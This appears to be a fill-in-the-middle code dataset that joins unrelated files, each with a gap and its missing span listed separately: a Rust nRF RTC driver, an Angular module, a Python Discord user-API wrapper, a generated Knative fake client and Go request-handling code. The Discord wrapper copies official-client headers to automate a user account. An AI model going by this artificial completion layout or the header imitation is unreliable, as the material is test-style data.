/// years. For comparison, flash memory like the one containing your firmware is usually rated to retain
/// data for only 10-20 years. 34865 years is long enough!
fn calc_now(period: u32, counter: u32) -> u64 {
((period as u64) << 23) + ((counter ^ ((period & 1) << 23)) as u64)
}
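/// Returns the INTENSET/INTENCLR bit for the COMPARE[n] event.
/// On the nRF RTC the COMPARE event interrupt bits start at bit 16.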
fn compare_n(n: usize) -> u32 {
1 << (n + 16)
}
#[cfg(test)]
mod test {
use super::*;
#[test]
fn test_calc_now() {
assert_eq!(calc_now(0, 0x000000), 0x0_000000);
assert_eq!(calc_now(0, 0x000001), 0x0_000001);
assert_eq!(calc_now(0, 0x7FFFFF), 0x0_7FFFFF);
assert_eq!(calc_now(1, 0x7FFFFF), 0x1_7FFFFF);
assert_eq!(calc_now(0, 0x800000), 0x0_800000);
assert_eq!(calc_now(1, 0x800000), 0x0_800000);
assert_eq!(calc_now(1, 0x800001), 0x0_800001);
assert_eq!(calc_now(1, 0xFFFFFF), 0x0_FFFFFF);
assert_eq!(calc_now(2, 0xFFFFFF), 0x1_FFFFFF);
assert_eq!(calc_now(1, 0x000000), 0x1_000000);
assert_eq!(calc_now(2, 0x000000), 0x1_000000);
}
}
struct AlarmState {
timestamp: Cell<u64>,
    // This is really an Option<(fn(*mut ()), *mut ())>
    // but fn pointers aren't allowed in const yet
callback: Cell<*const ()>,
ctx: Cell<*mut ()>,
}
unsafe impl Send for AlarmState {}
impl AlarmState {
const fn new() -> Self {
Self {
timestamp: Cell::new(u64::MAX),
callback: Cell::new(ptr::null()),
ctx: Cell::new(ptr::null_mut()),
}
}
}
const ALARM_COUNT: usize = 3;
struct RtcDriver {
/// Number of 2^23 periods elapsed since boot.
period: AtomicU32,
alarm_count: AtomicU8,
/// Timestamp at which to fire alarm. u64::MAX if no alarm is scheduled.
alarms: Mutex<[AlarmState; ALARM_COUNT]>,
}
const ALARM_STATE_NEW: AlarmState = AlarmState::new();
embassy::time_driver_impl!(static DRIVER: RtcDriver = RtcDriver {
period: AtomicU32::new(0),
alarm_count: AtomicU8::new(0),
alarms: Mutex::const_new(CriticalSectionRawMutex::new(), [ALARM_STATE_NEW; ALARM_COUNT]),
});
impl RtcDriver {
fn init(&'static self, irq_prio: crate::interrupt::Priority) {
let r = rtc();
r.cc[3].write(|w| unsafe { w.bits(0x800000) });
r.intenset.write(|w| {
let w = w.ovrflw().set();
let w = w.compare3().set();
w
});
r.tasks_clear.write(|w| unsafe { w.bits(1) });
r.tasks_start.write(|w| unsafe { w.bits(1) });
// Wait for clear
while r.counter.read().bits() != 0 {}
let irq = unsafe { interrupt::RTC1::steal() };
irq.set_priority(irq_prio);
irq.enable();
}
fn on_interrupt(&self) {
let r = rtc();
if r.events_ovrflw.read().bits() == 1 {
r.events_ovrflw.write(|w| w);
self.next_period();
}
if r.events_compare[3].read().bits() == 1 {
r.events_compare[3].write(|w| w);
self.next_period();
}
for n in 0..ALARM_COUNT {
if r.events_compare[n].read().bits() == 1 {
r.events_compare[n].write(|w| w);
critical_section::with(|cs| {
self.trigger_alarm(n, cs);
})
}
}
}
fn next_period(&self) {
critical_section::with(|cs| {
let r = rtc();
let period = self.period.fetch_add(1, Ordering::Relaxed) + 1;
let t = (period as u64) << 23;
for n in 0..ALARM_COUNT {
let alarm = &self.alarms.borrow(cs)[n];
let at = alarm.timestamp.get();
if at < t + 0xc00000 {
// just enable it. `set_alarm` has already set the correct CC val.
r.intenset.write(|w| unsafe { w.bits(compare_n(n)) });
}
}
})
}
fn get_alarm<'a>(&'a self, cs: CriticalSection<'a>, alarm: AlarmHandle) -> &'a AlarmState {
// safety: we're allowed to assume the AlarmState is created by us, and
// we never create one that's out of bounds.
unsafe { self.alarms.borrow(cs).get_unchecked(alarm.id() as usize) }
}
fn trigger_alarm(&self, n: usize, cs: CriticalSection) {
let r = rtc();
r.intenclr.write(|w| unsafe { w.bits(compare_n(n)) });
let alarm = &self.alarms.borrow(cs)[n];
alarm.timestamp.set(u64::MAX);
// Call after clearing alarm, so the callback can set another alarm.
// safety:
        // - we can ignore the possibility of `f` being unset (null) because of the safety contract of `allocate_alarm`.
// - other than that we only store valid function pointers into alarm.callback
let f: fn(*mut ()) = unsafe { mem::transmute(alarm.callback.get()) };
f(alarm.ctx.get());
}
}
impl Driver for RtcDriver {
fn | (&self) -> u64 {
// `period` MUST be read before `counter`, see comment at the top for details.
let period = self.period.load(Ordering::Relaxed);
compiler_fence(Ordering::Acquire);
let counter = rtc().counter.read().bits();
calc_now(period, counter)
}
unsafe fn allocate_alarm(&self) -> Option<AlarmHandle> {
let id = self.alarm_count.fetch_update(Ordering::AcqRel, Ordering::Acquire, |x| {
if x < ALARM_COUNT as u8 {
Some(x + 1)
} else {
None
}
});
match id {
Ok(id) => Some(AlarmHandle::new(id)),
Err(_) => None,
}
}
fn set_alarm_callback(&self, alarm: AlarmHandle, callback: fn(*mut ()), ctx: *mut ()) {
critical_section::with(|cs| {
let alarm = self.get_alarm(cs, alarm);
alarm.callback.set(callback as *const ());
alarm.ctx.set(ctx);
})
}
fn set_alarm(&self, alarm: AlarmHandle, timestamp: u64) {
critical_section::with(|cs| {
let n = alarm.id() as _;
let alarm = self.get_alarm(cs, alarm);
alarm.timestamp.set(timestamp);
let t = self.now();
// If alarm timestamp has passed, trigger it instantly.
if timestamp <= t {
self.trigger_alarm(n, cs);
return;
}
let r = rtc();
            // If it hasn't triggered yet, set it up in the compare channel.
// Write the CC value regardless of whether we're going to enable it now or not.
// This way, when we enable it later, the right value is already set.
// nrf52 docs say:
// If the COUNTER is N, writing N or N+1 to a CC register may not trigger a COMPARE event.
            // To work around this, we never write a timestamp smaller than N+3.
            // N+2 is not safe because the RTC can tick from N to N+1 between calling now() and writing CC.
//
// It is impossible for rtc to tick more than once because
// - this code takes less time than 1 tick
// - it runs with interrupts disabled so nothing else can preempt it.
//
// This means that an alarm can be delayed for up to 2 ticks (from t+1 to t+3), but this is allowed
// by the Alarm trait contract. What's not allowed is triggering alarms *before* their scheduled time,
// and we don't do that here.
let safe_timestamp = timestamp.max(t + 3);
r.cc[n].write(|w| unsafe { w.bits(safe_timestamp as u32 & 0xFFFFFF) });
let diff = timestamp - t;
if diff < 0xc00000 {
r.intenset.write(|w| unsafe { w.bits(compare_n(n)) });
} else {
                // If it's too far in the future, don't set up the compare channel yet.
                // It will be set up later by `next_period`.
r.intenclr.write(|w| unsafe { w.bits(compare_n(n)) });
}
})
}
}
#[interrupt]
fn RTC1() {
DRIVER.on_interrupt()
}
pub(crate) fn init(irq_prio: crate::interrupt::Priority) {
DRIVER.init(irq_prio)
}
| now |
app.module.ts | import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { FormsModule } from '@angular/forms';
import { HttpModule } from '@angular/http';
import { routing } from './app.routing';
import { masterFirebaseConfig } from './api-keys';
import { AngularFireModule } from 'angularfire2';
import { AngularFireDatabaseModule } from 'angularfire2/database';
import { AppComponent } from './app.component';
import { AboutComponent } from './about/about.component';
import { WelcomeComponent } from './welcome/welcome.component';
import { ActorsComponent } from './actors/actors.component';
import { ActorDetailComponent } from './actor-detail/actor-detail.component';
import { AdminComponent } from './admin/admin.component';
import { EditActorComponent } from './edit-actor/edit-actor.component';
import { ContactComponent } from './contact/contact.component';
import { ArtisticTeamComponent } from './artistic-team/artistic-team.component';
export const firebaseConfig = {
apiKey: masterFirebaseConfig.apiKey,
authDomain: masterFirebaseConfig.authDomain,
databaseURL: masterFirebaseConfig.databaseURL,
storageBucket: masterFirebaseConfig.storageBucket
};
@NgModule({
declarations: [
AppComponent,
AboutComponent,
WelcomeComponent,
ActorsComponent,
ActorDetailComponent,
AdminComponent,
EditActorComponent,
ContactComponent,
ArtisticTeamComponent
],
imports: [
BrowserModule,
FormsModule,
HttpModule,
routing,
AngularFireModule.initializeApp(firebaseConfig),
AngularFireDatabaseModule
],
providers: [],
bootstrap: [AppComponent]
})
export class | { }
| AppModule |
guild.py | from ..RESTapiwrap import Wrapper
from ..utils.permissions import PERMS, Permissions
from ..utils.contextproperties import ContextProperties
import time
import base64
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
class Guild(object):
__slots__ = ['discord', 's', 'log']
def __init__(self, discord, s, log): #s is the requests session object
self.discord = discord
self.s = s
self.log = log
'''
invite codes / server info
'''
#get guild info from invite code
def getInfoFromInviteCode(self, inviteCode, with_counts, with_expiration, fromJoinGuildNav):
|
#just the join guild endpoint, default location mimics joining a guild from the ([+]Add a Server) button
def joinGuildRaw(self, inviteCode, guild_id=None, channel_id=None, channel_type=None, location="join guild"):
url = self.discord+"invites/"+inviteCode
if location in ("accept invite page", "join guild"):
return Wrapper.sendRequest(self.s, 'post', url, {}, headerModifications={"update":{"X-Context-Properties":ContextProperties.get(location, guild_id=guild_id, channel_id=channel_id, channel_type=channel_type)}}, log=self.log)
elif location == "markdown":
return Wrapper.sendRequest(self.s, 'post', url, {}, headerModifications={"update":{"X-Context-Properties":ContextProperties.get("markdown")}}, log=self.log)
def joinGuild(self, inviteCode, location, wait):
location = location.lower()
if location in ("accept invite page", "join guild"):
guildData = self.getInfoFromInviteCode(inviteCode, with_counts=True, with_expiration=True, fromJoinGuildNav=(location.lower()=="join guild")).json()
if wait: time.sleep(wait)
return self.joinGuildRaw(inviteCode, guildData["guild"]["id"], guildData["channel"]["id"], guildData["channel"]["type"], location)
elif location == "markdown":
return self.joinGuildRaw(inviteCode, location="markdown")
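    # Illustrative usage (assumes `g` is a Guild instance built with a requests session):
    #     g.joinGuild('<inviteCode>', location='join guild', wait=1)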
def previewGuild(self, guildID, sessionID):
url = self.discord+"guilds/"+guildID+"/members/@me?lurker=true"
if sessionID != None:
url += "&session_id="+sessionID
return Wrapper.sendRequest(self.s, 'put', url, headerModifications={"update":{"X-Context-Properties":"e30="}}, log=self.log)
def leaveGuild(self, guildID, lurking):
url = self.discord+"users/@me/guilds/"+guildID
body = {"lurking": lurking}
return Wrapper.sendRequest(self.s, 'delete', url, body, log=self.log)
    def createInvite(self, channelID, max_age_seconds, max_uses, grantTempMembership, checkInvite, targetType): #has to be a channel that's in a guild; checkInvite and targetType are basically useless.
url = self.discord+"channels/"+channelID+"/invites"
if max_age_seconds == False:
max_age_seconds = 0
if max_uses == False:
max_uses = 0
body = {"max_age": max_age_seconds, "max_uses": max_uses, "temporary": grantTempMembership}
if checkInvite != "":
body["validate"] = checkInvite
if targetType != "":
body["target_type"] = targetType
return Wrapper.sendRequest(self.s, 'post', url, body, headerModifications={"update":{"X-Context-Properties":ContextProperties.get("guild header")}}, log=self.log)
def deleteInvite(self, inviteCode):
url = self.discord+'invites/'+inviteCode
return Wrapper.sendRequest(self.s, 'delete', url, log=self.log)
def getGuildInvites(self, guildID):
url = self.discord+'guilds/'+guildID+'/invites'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getChannelInvites(self, channelID):
url = self.discord+'channels/'+channelID+'/invites'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getGuilds(self, with_counts):
url = self.discord+"users/@me/guilds"
if with_counts != None:
url += "?with_counts="+repr(with_counts).lower()
headerMods = {"update":{"X-Track":self.s.headers.get("X-Super-Properties")}, "remove":["X-Super-Properties"]}
return Wrapper.sendRequest(self.s, 'get', url, headerModifications=headerMods, log=self.log)
def getGuildChannels(self, guildID):
url = self.discord+'guilds/'+guildID+'/channels'
headerMods = {"update":{"X-Track":self.s.headers.get("X-Super-Properties")}, "remove":["X-Super-Properties"]}
return Wrapper.sendRequest(self.s, 'get', url, headerModifications=headerMods, log=self.log)
def getDiscoverableGuilds(self, offset, limit):
url = self.discord+"discoverable-guilds?offset="+repr(offset)+"&limit="+repr(limit)
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getGuildRegions(self, guildID):
url = self.discord+'guilds/'+guildID+'/regions'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
'''
server moderation and management
'''
#create a guild
def createGuild(self, name, icon, channels, systemChannelID, template):
url = self.discord+"guilds"
body = {"name": name, "icon":icon, "channels":channels, "system_channel_id":systemChannelID, "guild_template_code":template}
if icon != None:
with open(icon, "rb") as image:
encodedImage = base64.b64encode(image.read()).decode('utf-8')
body["icon"] = "data:image/png;base64,"+encodedImage
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
#delete a guild (assuming you are the owner)
def deleteGuild(self, guildID):
url = self.discord+"guilds/%s/delete" % (guildID)
body = {}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
#kick a user
def kick(self, guildID, userID, reason):
url = self.discord+"guilds/%s/members/%s?reason=%s" % (guildID, userID, quote(reason))
headerMods = {"update":{"X-Audit-Log-Reason":reason}} if reason=="" else {}
return Wrapper.sendRequest(self.s, 'delete', url, headerModifications=headerMods, log=self.log)
#ban a user
def ban(self, guildID, userID, deleteMessagesDays, reason):
url = self.discord+"guilds/%s/bans/%s" % (guildID, userID)
body = {"delete_message_days": str(deleteMessagesDays), "reason": reason}
headerMods = {"update":{"X-Audit-Log-Reason":reason}} if reason=="" else {}
return Wrapper.sendRequest(self.s, 'put', url, body, headerModifications=headerMods, log=self.log)
def revokeBan(self, guildID, userID):
url = self.discord+"guilds/"+guildID+"/bans/"+userID
return Wrapper.sendRequest(self.s, 'delete', url, log=self.log)
#lookup a user in a guild. thx Echocage for finding this api endpoint
'''
removed as this is a bot-only request. Use bot.gateway.checkGuildMembers instead.
def getGuildMember(self, guildID, userID):
url = self.discord+"guilds/%s/members/%s" % (guildID, userID)
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
'''
def getRoleMemberCounts(self, guildID):
url = self.discord+"guilds/"+guildID+"/roles/member-counts"
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getGuildIntegrations(self, guildID, include_applications):
url = self.discord+"guilds/"+guildID+"/integrations"
if include_applications != None:
url += "?include_applications="+repr(include_applications).lower()
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getGuildTemplates(self, guildID):
url = self.discord+"guilds/"+guildID+"/templates"
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getRoleMemberIDs(self, guildID, roleID):
url = self.discord+"guilds/"+guildID+"/roles/"+roleID+"/member-ids"
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def addMembersToRole(self, guildID, roleID, memberIDs):
if isinstance(memberIDs, str):
memberIDs = [memberIDs]
url = self.discord+"guilds/"+guildID+"/roles/"+roleID+"/members"
body = {"member_ids":memberIDs}
return Wrapper.sendRequest(self.s, 'patch', url, body, log=self.log)
def setMemberRoles(self, guildID, memberID, roleIDs):
if isinstance(roleIDs, str):
roleIDs = [roleIDs]
url = self.discord+"guilds/"+guildID+"/members/"+memberID
body = {"roles": roleIDs}
return Wrapper.sendRequest(self.s, 'patch', url, body, log=self.log)
'''
other stuff
'''
#get member verification data
def getMemberVerificationData(self, guildID, with_guild, invite_code):
url = self.discord+"guilds/"+guildID+"/member-verification?with_guild="+str(with_guild).lower()
if invite_code != None:
url += "&invite_code="+invite_code
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def agreeGuildRules(self, guildID, form_fields, version):
url = self.discord+"guilds/"+guildID+"/requests/@me"
form_fields[0]['response'] = True
body = {"version":version, "form_fields":form_fields}
return Wrapper.sendRequest(self.s, 'put', url, body, log=self.log)
### threads
#create thread
def createThread(self, channelID, name, messageID, public, archiveAfter):
url = self.discord+"channels/"+channelID
if messageID:
url += "/messages/"+messageID
url += "/threads"
        choice = archiveAfter.lower()
        # Discord's auto_archive_duration field is expressed in minutes.
        if choice == '1 hour':
            archiveAfterMinutes = 60
        elif choice in ('24 hour', '24 hours', '1 day'):
            archiveAfterMinutes = 1440
        elif choice in ('3 day', '3 days'):
            archiveAfterMinutes = 4320
        elif choice in ('1 week', '7 day', '7 days'):
            archiveAfterMinutes = 10080
        else:
            raise ValueError('Unrecognized archiveAfter value: %s' % archiveAfter)
        threadType = 11 if public else 12
        body = {"name": name, "type": threadType, "auto_archive_duration": archiveAfterMinutes}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
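    # Illustrative usage (assumes `g` is a Guild instance):
    #     g.createThread(channelID, 'my-thread', messageID=None, public=True, archiveAfter='1 day')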
#leave thread
def leaveThread(self, threadID, location):
url = self.discord+"channels/"+threadID+"/thread-members/@me?location="+quote(location)
return Wrapper.sendRequest(self.s, 'delete', url, log=self.log)
#join thread
def joinThread(self, threadID, location):
url = self.discord+"channels/"+threadID+"/thread-members/@me?location="+quote(location)
return Wrapper.sendRequest(self.s, 'post', url, log=self.log)
#archive thread
def archiveThread(self, threadID, lock):
url = self.discord+"channels/"+threadID
body = {"archived": True, "locked": lock}
return Wrapper.sendRequest(self.s, 'patch', url, body, log=self.log)
#unarchive thread
def unarchiveThread(self, threadID, lock):
url = self.discord+"channels/"+threadID
body = {"archived": False, "locked": lock}
return Wrapper.sendRequest(self.s, 'patch', url, body, log=self.log)
'''
other
'''
#lookup school
def lookupSchool(self, email, allowMultipleGuilds, useVerificationCode):
url = self.discord+"guilds/automations/email-domain-lookup"
body = {"email":email,"allow_multiple_guilds":allowMultipleGuilds}
if useVerificationCode != None:
body["use_verification_code"] = useVerificationCode
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
#https://discord.com/channels/hubID/mainChannelID
def schoolHubWaitlistSignup(self, email, school):
url = self.discord+"hub-waitlist/signup"
body = {"email":email,"school":school}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
def schoolHubSignup(self, email, hubID):
url = self.discord+'guilds/automations/email-domain-lookup'
body = {"email":email,"guild_id":hubID,"allow_multiple_guilds":True,"use_verification_code":True}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
def verifySchoolHubSignup(self, hubID, email, code):
url = self.discord+'guilds/automations/email-domain-lookup/verify-code'
body = {"code":code,"guild_id":hubID,"email":email}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
def getSchoolHubGuilds(self, hubID): #note, the "entity_id" returned in each entry is the guildID
url = self.discord+'channels/'+hubID+'/directory-entries' #ik it says channels, but it's the hubID/"guildID".
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getSchoolHubDirectoryCounts(self, hubID): #this only returns the # of guilds/groups in each directory/category. This doesn't even return the category names
url = self.discord+'channels/'+hubID+'/directory-entries/counts'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def joinGuildFromSchoolHub(self, hubID, guildID):
url = self.discord+'guilds/'+guildID+'/members/@me?lurker=false&directory_channel_id='+hubID
headerMods = {"update":{"X-Context-Properties":ContextProperties.get("school hub guild")}}
return Wrapper.sendRequest(self.s, 'put', url, headerModifications=headerMods, log=self.log)
def searchSchoolHub(self, hubID, query):
url = self.discord+'channels/'+hubID+'/directory-entries/search?query='+query
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getMySchoolHubGuilds(self, hubID): #or guilds you own that can potentially be added to the hub
url = self.discord+'channels/'+hubID+'/directory-entries/list'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def setSchoolHubGuildDetails(self, hubID, guildID, description, directoryID): #directoryID (int) is not a snowflake
url = self.discord+'channels/'+hubID+'/directory-entry/'+guildID
body = {"description":description,"primary_category_id":directoryID}
return Wrapper.sendRequest(self.s, 'post', url, body, log=self.log)
def getLiveStages(self, extra):
url = self.discord+'stage-instances'
if extra:
url += '/extra'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
#the only time this is observed in the client is in a guild
def getChannel(self, channelID):
url = self.discord+'channels/'+channelID
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
def getGuildActivitiesConfig(self, guildID):
url = self.discord+'activities/guilds/'+guildID+'/config'
return Wrapper.sendRequest(self.s, 'get', url, log=self.log)
| url = self.discord+"invites/"+inviteCode
if (with_counts!=None or with_expiration!=None or fromJoinGuildNav):
url += "?"
data = {}
if fromJoinGuildNav:
data["inputValue"] = inviteCode
if with_counts != None:
data["with_counts"] = with_counts
if with_expiration != None:
data["with_expiration"] = with_expiration
url += "&".join( "%s=%s" % (k, quote(repr(data[k]).lower())) for k in data)
return Wrapper.sendRequest(self.s, 'get', url, log=self.log) |
fake_apiserversource.go | /*
Copyright 2021 The Knative Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by client-gen. DO NOT EDIT.
package fake
import (
"context"
v1 "k8s.io/apimachinery/pkg/apis/meta/v1"
labels "k8s.io/apimachinery/pkg/labels"
schema "k8s.io/apimachinery/pkg/runtime/schema"
types "k8s.io/apimachinery/pkg/types"
watch "k8s.io/apimachinery/pkg/watch"
testing "k8s.io/client-go/testing"
v1alpha2 "knative.dev/eventing/pkg/apis/sources/v1alpha2"
)
// FakeApiServerSources implements ApiServerSourceInterface
type FakeApiServerSources struct {
Fake *FakeSourcesV1alpha2
ns string
}
var apiserversourcesResource = schema.GroupVersionResource{Group: "sources.knative.dev", Version: "v1alpha2", Resource: "apiserversources"}
var apiserversourcesKind = schema.GroupVersionKind{Group: "sources.knative.dev", Version: "v1alpha2", Kind: "ApiServerSource"}
// Get takes name of the apiServerSource, and returns the corresponding apiServerSource object, and an error if there is any.
func (c *FakeApiServerSources) Get(ctx context.Context, name string, options v1.GetOptions) (result *v1alpha2.ApiServerSource, err error) {
obj, err := c.Fake.
Invokes(testing.NewGetAction(apiserversourcesResource, c.ns, name), &v1alpha2.ApiServerSource{})
if obj == nil {
return nil, err
}
return obj.(*v1alpha2.ApiServerSource), err
}
// List takes label and field selectors, and returns the list of ApiServerSources that match those selectors.
func (c *FakeApiServerSources) List(ctx context.Context, opts v1.ListOptions) (result *v1alpha2.ApiServerSourceList, err error) {
obj, err := c.Fake.
Invokes(testing.NewListAction(apiserversourcesResource, apiserversourcesKind, c.ns, opts), &v1alpha2.ApiServerSourceList{})
if obj == nil {
return nil, err
}
label, _, _ := testing.ExtractFromListOptions(opts)
if label == nil {
label = labels.Everything()
}
list := &v1alpha2.ApiServerSourceList{ListMeta: obj.(*v1alpha2.ApiServerSourceList).ListMeta}
for _, item := range obj.(*v1alpha2.ApiServerSourceList).Items {
if label.Matches(labels.Set(item.Labels)) {
list.Items = append(list.Items, item)
}
}
return list, err
}
// Watch returns a watch.Interface that watches the requested apiServerSources.
func (c *FakeApiServerSources) Watch(ctx context.Context, opts v1.ListOptions) (watch.Interface, error) {
return c.Fake.
InvokesWatch(testing.NewWatchAction(apiserversourcesResource, c.ns, opts))
}
// Create takes the representation of a apiServerSource and creates it. Returns the server's representation of the apiServerSource, and an error, if there is any.
func (c *FakeApiServerSources) Create(ctx context.Context, apiServerSource *v1alpha2.ApiServerSource, opts v1.CreateOptions) (result *v1alpha2.ApiServerSource, err error) {
obj, err := c.Fake.
Invokes(testing.NewCreateAction(apiserversourcesResource, c.ns, apiServerSource), &v1alpha2.ApiServerSource{})
if obj == nil {
return nil, err
}
return obj.(*v1alpha2.ApiServerSource), err
}
// Update takes the representation of a apiServerSource and updates it. Returns the server's representation of the apiServerSource, and an error, if there is any.
func (c *FakeApiServerSources) Update(ctx context.Context, apiServerSource *v1alpha2.ApiServerSource, opts v1.UpdateOptions) (result *v1alpha2.ApiServerSource, err error) {
obj, err := c.Fake.
Invokes(testing.NewUpdateAction(apiserversourcesResource, c.ns, apiServerSource), &v1alpha2.ApiServerSource{})
if obj == nil {
return nil, err
}
return obj.(*v1alpha2.ApiServerSource), err
}
| func (c *FakeApiServerSources) UpdateStatus(ctx context.Context, apiServerSource *v1alpha2.ApiServerSource, opts v1.UpdateOptions) (*v1alpha2.ApiServerSource, error) {
obj, err := c.Fake.
Invokes(testing.NewUpdateSubresourceAction(apiserversourcesResource, "status", c.ns, apiServerSource), &v1alpha2.ApiServerSource{})
if obj == nil {
return nil, err
}
return obj.(*v1alpha2.ApiServerSource), err
}
// Delete takes name of the apiServerSource and deletes it. Returns an error if one occurs.
func (c *FakeApiServerSources) Delete(ctx context.Context, name string, opts v1.DeleteOptions) error {
_, err := c.Fake.
Invokes(testing.NewDeleteAction(apiserversourcesResource, c.ns, name), &v1alpha2.ApiServerSource{})
return err
}
// DeleteCollection deletes a collection of objects.
func (c *FakeApiServerSources) DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error {
action := testing.NewDeleteCollectionAction(apiserversourcesResource, c.ns, listOpts)
_, err := c.Fake.Invokes(action, &v1alpha2.ApiServerSourceList{})
return err
}
// Patch applies the patch and returns the patched apiServerSource.
func (c *FakeApiServerSources) Patch(ctx context.Context, name string, pt types.PatchType, data []byte, opts v1.PatchOptions, subresources ...string) (result *v1alpha2.ApiServerSource, err error) {
obj, err := c.Fake.
Invokes(testing.NewPatchSubresourceAction(apiserversourcesResource, c.ns, name, pt, data, subresources...), &v1alpha2.ApiServerSource{})
if obj == nil {
return nil, err
}
return obj.(*v1alpha2.ApiServerSource), err
} | // UpdateStatus was generated because the type contains a Status member.
// Add a +genclient:noStatus comment above the type to avoid generating UpdateStatus(). |
guidepost__fill.go | /*-
* Copyright (c) 2016-2017, Jörg Pernfuß
*
* Use of this source code is governed by a 2-clause BSD license
* that can be found in the LICENSE file.
*/
package soma
import (
"database/sql"
"fmt"
"strconv"
"github.com/mjolnir42/soma/internal/msg"
"github.com/mjolnir42/soma/internal/stmt"
"github.com/mjolnir42/soma/lib/proto"
"github.com/satori/go.uuid"
)
//
func (g *GuidePost) fillReqData(q *msg.Request) (bool, error) {
switch {
case q.Action == msg.ActionPropertyCreate && q.Property.Type == `service`:
return g.fillServiceAttributes(q)
case q.Section == msg.SectionNodeConfig && q.Action == msg.ActionAssign:
return g.fillNode(q)
case q.Section == msg.SectionCheckConfig && q.Action == msg.ActionDestroy:
return g.fillCheckDeleteInfo(q)
case q.Section == msg.SectionBucket && q.Action == msg.ActionCreate:
return g.fillBucketID(q)
case q.Section == msg.SectionGroup && q.Action == msg.ActionCreate:
return g.fillGroupID(q)
case q.Section == msg.SectionCluster && q.Action == msg.ActionCreate:
return g.fillClusterID(q)
case q.Action == msg.ActionPropertyDestroy:
return g.fillPropertyDeleteInfo(q)
case q.Section == msg.SectionCheckConfig && q.Action == msg.ActionCreate:
return g.fillCheckConfigID(q)
default:
return false, nil
}
}
// generate CheckConfigID
func (g *GuidePost) fillCheckConfigID(q *msg.Request) (bool, error) {
q.CheckConfig.ID = uuid.Must(uuid.NewV4()).String()
return false, nil
}
// generate BucketID
func (g *GuidePost) fillBucketID(q *msg.Request) (bool, error) {
q.Bucket.ID = uuid.Must(uuid.NewV4()).String()
return false, nil
}
// generate GroupID
func (g *GuidePost) fillGroupID(q *msg.Request) (bool, error) {
q.Group.ID = uuid.Must(uuid.NewV4()).String()
return false, nil
}
// generate ClusterID
func (g *GuidePost) fillClusterID(q *msg.Request) (bool, error) {
q.Cluster.ID = uuid.Must(uuid.NewV4()).String()
return false, nil
}
// Populate the node structure with data, overwriting the client
// submitted values.
func (g *GuidePost) fillNode(q *msg.Request) (bool, error) {
var (
err error
ndName, ndTeam, ndServer string
ndAsset int64
ndOnline, ndDeleted bool
)
if err = g.stmtNodeDetails.QueryRow(q.Node.ID).Scan(
&ndAsset,
&ndName,
&ndTeam,
&ndServer,
&ndOnline,
&ndDeleted,
); err != nil {
if err == sql.ErrNoRows {
return true, fmt.Errorf("Node not found: %s", q.Node.ID)
}
return false, err
}
q.Node.AssetID = uint64(ndAsset)
q.Node.Name = ndName
q.Node.TeamID = ndTeam
q.Node.ServerID = ndServer
q.Node.IsOnline = ndOnline
q.Node.IsDeleted = ndDeleted
return false, nil
}
// load authoritative copy of the service attributes from the
// database. Replaces whatever the client sent in.
func (g *GuidePost) fillServiceAttributes(q *msg.Request) (bool, error) {
var (
serviceID, attr, val, svName, svTeam, repoID string
rows *sql.Rows
err error
nf bool
)
attrs := []proto.ServiceAttribute{}
switch q.Section {
case msg.SectionRepositoryConfig:
// svName may be the ID or the name
serviceID = (*q.Repository.Properties)[0].Service.ID
svName = (*q.Repository.Properties)[0].Service.Name
svTeam = (*q.Repository.Properties)[0].Service.TeamID
case msg.SectionBucket:
serviceID = (*q.Bucket.Properties)[0].Service.ID
svName = (*q.Bucket.Properties)[0].Service.Name
svTeam = (*q.Bucket.Properties)[0].Service.TeamID
case msg.SectionGroup:
serviceID = (*q.Group.Properties)[0].Service.ID
svName = (*q.Group.Properties)[0].Service.Name
svTeam = (*q.Group.Properties)[0].Service.TeamID
case msg.SectionCluster:
serviceID = (*q.Cluster.Properties)[0].Service.ID
svName = (*q.Cluster.Properties)[0].Service.Name
svTeam = (*q.Cluster.Properties)[0].Service.TeamID
case msg.SectionNodeConfig:
serviceID = (*q.Node.Properties)[0].Service.ID
svName = (*q.Node.Properties)[0].Service.Name
svTeam = (*q.Node.Properties)[0].Service.TeamID
}
// ignore error since it would have been caught by GuidePost
repoID, _, _, _ = g.extractRouting(q)
	// check that the tuple (repo, team, service) is valid.
	// also resolve and disambiguate serviceID and serviceName
if err = g.stmtServiceLookup.QueryRow(
repoID, serviceID, svName, svTeam,
).Scan(
&serviceID,
&svName,
); err != nil {
if err == sql.ErrNoRows {
nf = true
err = fmt.Errorf("Requested service %s not available for team %s",
svName, svTeam)
}
goto abort
}
// load attributes
if rows, err = g.stmtServiceAttributes.Query(
repoID, serviceID, svTeam,
); err != nil {
goto abort
}
defer rows.Close()
attrloop:
for rows.Next() {
if err = rows.Scan(&attr, &val); err != nil {
break attrloop
}
attrs = append(attrs, proto.ServiceAttribute{
Name: attr,
Value: val,
